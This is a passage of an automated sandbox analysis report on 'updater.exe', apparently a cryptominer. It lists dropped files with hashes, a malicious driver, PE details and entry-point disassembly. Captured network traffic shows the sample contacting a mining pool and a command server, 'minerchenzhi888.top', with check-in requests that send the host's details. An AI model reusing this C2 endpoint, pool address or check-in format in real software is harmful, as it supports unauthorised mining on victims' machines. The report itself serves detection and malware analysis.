                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjhjpv3a.eyj.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hihuyzqk.z44.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_off4oeim.vh2.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................

                                        C:\Windows\Temp\__PSScriptPolicyTest_jexqylwn.hal.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\Temp\__PSScriptPolicyTest_kmwd3ixl.5y3.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\Temp\__PSScriptPolicyTest_nstgawok.tch.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\Temp\__PSScriptPolicyTest_rocwwxrw.ffz.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Windows\Temp\zlvyxohjpfnw.sys

                                        Download File
                                        Process:C:\ProgramData\Google\Chrome\updater.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):14544
                                        Entropy (8bit):6.2660301556221185
                                        Encrypted:false
                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 5%
                                        • Antivirus: Virustotal, Detection: 4%, Browse
                                        Joe Sandbox View:
                                        • Filename: 7QiAmg58Jk.exe, Detection: malicious, Browse
                                        • Filename: LnK0dS8jcA.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: S0FTWARE.exe, Detection: malicious, Browse
                                        • Filename: Gw2G72kSsY.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: System.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Entropy (8bit):6.5920384034620385
                                        TrID:
                                        • Win64 Executable GUI (202006/5) 92.65%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:updater.exe
                                        File size:2'728'960 bytes
                                        MD5:a0c374f31894aa332d158f56608c89c3
                                        SHA1:0236445a761fca6dcda1b9014beb78198dfae9f8
                                        SHA256:ce7ca5446e66ce1e9190e16922fa33febb0789f27561aa820d1d1bf14c86cfe1
                                        SHA512:5596f10e8a0b7233b8a3ac76c3e3827e58f1213b2b54349d4f89ccb34d05032806ee6fe57cbdd8709898d53088f87404252d847baae0311693a451108519770b
                                        SSDEEP:49152:tgmXm6CldAIFE+WUQPiOpDrx04lD3x/7Mzub42MlGjGudSLfO:tjXm6CA4VtOpp04l97MqbYlGSawf
                                        TLSH:62C523C5B8084A75D94CA4FBE0B2DE71116F7C841AB145CE8EEA4C7ABF769D8203605F
                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........).....@..........@..............................*...........`........................................

                                        File Icon

                                        Icon Hash:f1e6e8f0ece49245

                                        Static PE Info

                                        General

                                        Entrypoint:0x140001140
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x140000000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x661FD2BD [Wed Apr 17 13:46:37 2024 UTC]
                                        TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:de41d4e0545d977de6ca665131bb479a

                                        Entrypoint Preview

                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        dec eax
                                        mov eax, dword ptr [00008ED5h]
                                        mov dword ptr [eax], 00000001h
                                        call 00007FB834400A4Fh
                                        nop
                                        nop
                                        nop
                                        dec eax
                                        add esp, 28h
                                        ret
                                        nop
                                        inc ecx
                                        push edi
                                        inc ecx
                                        push esi
                                        push esi
                                        push edi
                                        push ebx
                                        dec eax
                                        sub esp, 20h
                                        dec eax
                                        mov eax, dword ptr [00000030h]
                                        dec eax
                                        mov edi, dword ptr [eax+08h]
                                        dec eax
                                        mov esi, dword ptr [00008EC9h]
                                        xor eax, eax
                                        dec eax
                                        cmpxchg dword ptr [esi], edi
                                        sete bl
                                        je 00007FB834400A70h
                                        dec eax
                                        cmp edi, eax
                                        je 00007FB834400A6Bh
                                        dec esp
                                        mov esi, dword ptr [0000AAC9h]
                                        nop word ptr [eax+eax+00000000h]
                                        mov ecx, 000003E8h
                                        inc ecx
                                        call esi
                                        xor eax, eax
                                        dec eax
                                        cmpxchg dword ptr [esi], edi
                                        sete bl
                                        je 00007FB834400A47h
                                        dec eax
                                        cmp edi, eax
                                        jne 00007FB834400A29h
                                        dec eax
                                        mov edi, dword ptr [00008E90h]
                                        mov eax, dword ptr [edi]
                                        cmp eax, 01h
                                        jne 00007FB834400A4Eh
                                        mov ecx, 0000001Fh
                                        call 00007FB8344096E4h
                                        jmp 00007FB834400A69h
                                        cmp dword ptr [edi], 00000000h
                                        je 00007FB834400A4Bh
                                        mov byte ptr [00289529h], 00000001h
                                        jmp 00007FB834400A5Bh
                                        mov dword ptr [edi], 00000001h
                                        dec eax
                                        mov ecx, dword ptr [00008E7Ah]
                                        dec eax
                                        mov edx, dword ptr [00008E7Bh]
                                        call 00007FB8344096DBh
                                        mov eax, dword ptr [edi]
                                        cmp eax, 01h
                                        jne 00007FB834400A5Bh
                                        dec eax
                                        mov ecx, dword ptr [00008E50h]

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb9980x3c.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x28f0000x10c20.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x28c0000x18c.pdata
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a00000x78.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0xa0a00x28.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4100x138.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0xbb300x158.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x8ff60x9000bf829d3dba623ef23a06748dca6b4f77False0.4942491319444444data6.147852711939561IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0xa0000x20ec0x22002507e8395728b99ff2f56c30c4b9ae28False0.4596737132352941data4.697090361425568IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xd0000x27ea500x27d80065e7307a23b55acf23372f2cecd82782unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .pdata0x28c0000x18c0x200d262f440c13f4737b12ded5497cc5912False0.513671875data3.191401048077294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .00cfg0x28d0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .tls0x28e0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x28f0000x10c200x10e00ae67c3bd634cdd0f12fab93b480626c3False0.11255787037037036data4.6448197984454485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x2a00000x780x200abf2c05a4fabfc8918f09b1b70ae0c6dFalse0.2265625data1.4235256539400882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x28f0f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/mEnglishUnited States0.1083638944753342
                                        RT_GROUP_ICON0x29f9180x14dataEnglishUnited States1.15
                                        RT_VERSION0x29f9300x2f0SysEx File - IDPEnglishUnited States0.449468085106383

                                        Imports

                                        DLLImport
                                        msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                        KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-06T01:46:02.663461+02002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.11.20497575.161.70.18923333TCP
                                        2024-10-06T01:46:18.491045+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.11.2049758172.67.162.2980TCP
                                        2024-10-06T01:47:17.850114+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.11.2049760172.67.162.2980TCP
                                        2024-10-06T01:48:19.635954+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.11.2049761172.67.162.2980TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 6, 2024 01:46:16.849565029 CEST4975723333192.168.11.205.161.70.189
                                        Oct 6, 2024 01:46:16.948919058 CEST23333497575.161.70.189192.168.11.20
                                        Oct 6, 2024 01:46:16.949174881 CEST4975723333192.168.11.205.161.70.189
                                        Oct 6, 2024 01:46:16.949285984 CEST4975723333192.168.11.205.161.70.189
                                        Oct 6, 2024 01:46:17.048655033 CEST23333497575.161.70.189192.168.11.20
                                        Oct 6, 2024 01:46:17.049524069 CEST23333497575.161.70.189192.168.11.20
                                        Oct 6, 2024 01:46:17.095966101 CEST4975723333192.168.11.205.161.70.189
                                        Oct 6, 2024 01:46:17.891340971 CEST4975880192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:46:17.985747099 CEST8049758172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:46:17.986076117 CEST4975880192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:46:17.986577034 CEST4975880192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:46:18.080822945 CEST8049758172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:46:18.081039906 CEST4975880192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:46:18.175137997 CEST8049758172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:46:18.490771055 CEST8049758172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:46:18.491044998 CEST4975880192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:46:18.491503954 CEST8049758172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:46:18.491619110 CEST4975880192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:46:18.585448980 CEST8049758172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:46:31.269527912 CEST23333497575.161.70.189192.168.11.20
                                        Oct 6, 2024 01:46:31.311666965 CEST4975723333192.168.11.205.161.70.189
                                        Oct 6, 2024 01:46:34.779458046 CEST23333497575.161.70.189192.168.11.20
                                        Oct 6, 2024 01:46:34.826587915 CEST4975723333192.168.11.205.161.70.189
                                        Oct 6, 2024 01:47:08.344537973 CEST23333497575.161.70.189192.168.11.20
                                        Oct 6, 2024 01:47:08.397273064 CEST4975723333192.168.11.205.161.70.189
                                        Oct 6, 2024 01:47:17.237003088 CEST4976080192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:47:17.332417965 CEST8049760172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:47:17.332753897 CEST4976080192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:47:17.348447084 CEST4976080192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:47:17.443732977 CEST8049760172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:47:17.443960905 CEST4976080192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:47:17.539619923 CEST8049760172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:47:17.849739075 CEST8049760172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:47:17.850114107 CEST4976080192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:47:17.850446939 CEST8049760172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:47:17.850637913 CEST4976080192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:47:17.945564985 CEST8049760172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:47:42.220110893 CEST23333497575.161.70.189192.168.11.20
                                        Oct 6, 2024 01:47:42.264868021 CEST4975723333192.168.11.205.161.70.189
                                        Oct 6, 2024 01:48:16.775685072 CEST23333497575.161.70.189192.168.11.20
                                        Oct 6, 2024 01:48:16.819756031 CEST4975723333192.168.11.205.161.70.189
                                        Oct 6, 2024 01:48:19.027434111 CEST4976180192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:48:19.122524023 CEST8049761172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:48:19.123425961 CEST4976180192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:48:19.123850107 CEST4976180192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:48:19.218938112 CEST8049761172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:48:19.220191956 CEST4976180192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:48:19.315288067 CEST8049761172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:48:19.635543108 CEST8049761172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:48:19.635953903 CEST4976180192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:48:19.636218071 CEST8049761172.67.162.29192.168.11.20
                                        Oct 6, 2024 01:48:19.636392117 CEST4976180192.168.11.20172.67.162.29
                                        Oct 6, 2024 01:48:19.731340885 CEST8049761172.67.162.29192.168.11.20

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 6, 2024 01:46:16.669233084 CEST5389853192.168.11.201.1.1.1
                                        Oct 6, 2024 01:46:16.847032070 CEST53538981.1.1.1192.168.11.20
                                        Oct 6, 2024 01:46:17.793313980 CEST4923753192.168.11.201.1.1.1
                                        Oct 6, 2024 01:46:17.890455961 CEST53492371.1.1.1192.168.11.20

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 6, 2024 01:46:16.669233084 CEST192.168.11.201.1.1.10xea37Standard query (0)auto.c3pool.orgA (IP address)IN (0x0001)false
                                        Oct 6, 2024 01:46:17.793313980 CEST192.168.11.201.1.1.10x5851Standard query (0)minerchenzhi888.topA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 6, 2024 01:46:16.847032070 CEST1.1.1.1192.168.11.200xea37No error (0)auto.c3pool.org5.161.65.155A (IP address)IN (0x0001)false
                                        Oct 6, 2024 01:46:16.847032070 CEST1.1.1.1192.168.11.200xea37No error (0)auto.c3pool.org5.161.70.189A (IP address)IN (0x0001)false
                                        Oct 6, 2024 01:46:17.890455961 CEST1.1.1.1192.168.11.200x5851No error (0)minerchenzhi888.top172.67.162.29A (IP address)IN (0x0001)false
                                        Oct 6, 2024 01:46:17.890455961 CEST1.1.1.1192.168.11.200x5851No error (0)minerchenzhi888.top104.21.10.17A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • minerchenzhi888.top

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.11.2049758172.67.162.29806248C:\Windows\System32\svchost.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 6, 2024 01:46:17.986577034 CEST179OUTPOST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 467
                                        Content-Type: application/json
                                        Host: minerchenzhi888.top
                                        User-Agent: cpp-httplib/0.12.6
                                        Oct 6, 2024 01:46:18.081039906 CEST467OUTData Raw: 7b 22 69 64 22 3a 22 68 6c 68 77 7a 6a 77 72 78 72 65 77 62 62 6c 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 31 30 39 33 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 49 6e 74 65 6c 28
                                        Data Ascii: {"id":"hlhwzjwrxrewbblx","computername":"610930","username":"SYSTEM","gpu":"Intel(R) UHD Graphics 630","cpu":"Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":1,"type":"
                                        Oct 6, 2024 01:46:18.490771055 CEST732INHTTP/1.1 521
                                        Date: Sat, 05 Oct 2024 23:46:18 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 15
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BjLUvqPF9MP%2Fm1mKY%2BAytMm%2FY3Q79reTSgpbzW0keWzHrSsWoytKEnAfGPJ6%2FGQSG7SP1FAHtP1VLttBZ2jYmnWy%2BAF5kvVxJcjx4ZdvvVkTD%2Fm6zwlLxi%2FmdAugTfNsy5IcHB77"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        X-Frame-Options: SAMEORIGIN
                                        Referrer-Policy: same-origin
                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Server: cloudflare
                                        CF-RAY: 8ce14a4ebcef0c7a-EWR
                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                        Data Ascii: error code: 521


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.11.2049760172.67.162.29806248C:\Windows\System32\svchost.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 6, 2024 01:47:17.348447084 CEST179OUTPOST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 483
                                        Content-Type: application/json
                                        Host: minerchenzhi888.top
                                        User-Agent: cpp-httplib/0.12.6
                                        Oct 6, 2024 01:47:17.443960905 CEST483OUTData Raw: 7b 22 69 64 22 3a 22 68 6c 68 77 7a 6a 77 72 78 72 65 77 62 62 6c 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 31 30 39 33 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 49 6e 74 65 6c 28
                                        Data Ascii: {"id":"hlhwzjwrxrewbblx","computername":"610930","username":"SYSTEM","gpu":"Intel(R) UHD Graphics 630","cpu":"Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":60,"type":
                                        Oct 6, 2024 01:47:17.849739075 CEST720INHTTP/1.1 521
                                        Date: Sat, 05 Oct 2024 23:47:17 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 15
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kk0IzNwxRMU5c5XpUDeXaZHZ3SnZbTiObWHooBPAflhc3ySEOtxGCiv2O9aSiF0qAg0TbD5gR0RafQLKT34tUb2jbtD18jCeBt4d8v4HFcVITU%2BxVplByoRMpB3ESzIvxRcw6umq"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        X-Frame-Options: SAMEORIGIN
                                        Referrer-Policy: same-origin
                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Server: cloudflare
                                        CF-RAY: 8ce14bc1b8974316-EWR
                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                        Data Ascii: error code: 521


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2192.168.11.2049761172.67.162.2980
                                        TimestampBytes transferredDirectionData
